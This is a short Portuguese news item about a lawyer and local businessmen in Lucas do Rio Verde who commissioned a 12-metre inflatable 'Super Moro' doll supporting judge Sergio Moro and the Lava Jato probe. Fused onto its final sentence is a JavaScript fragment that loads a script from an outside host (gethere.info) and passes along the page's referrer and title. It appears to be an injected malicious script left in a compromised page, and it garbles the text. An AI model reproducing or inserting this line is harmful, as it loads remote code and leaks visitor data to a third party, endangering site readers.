Para demonstrar seu apoio ao juiz Sergio Moro e à Lava Jato, o advogado Vinícius Bitencourt, de 31 anos, morador de Lucas de Rio Verde (MT), teve uma ideia: encomendar um boneco inflável de 12 metros de altura, por seis de largura, na qual a imagem do juiz de Curitiba aparecia como o Super-Homem.
“É impossível passar despercebido”, comemora Vinícius. Nascia, assim, o Super Moro. Fabricado em Guarulhos, em São Paulo, teve seu valor – que preferem não revelar – rateado por 24 pessoas, empresários da cidade mato-grossense com pouco menos de 60 mil habitantes.
A estreia do “Super Moro” ocorreu na terça-feira,29, durante uma feira de tecnologia para o agronegócio no município. “Queríamos uma ideia original, pois o Pixuleco já está batido”, diz Vinícius, que promete levar o boneco inflável a Brasília para o dia da votação do impeachment. “Queremos o fim da corrupção”, defende.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;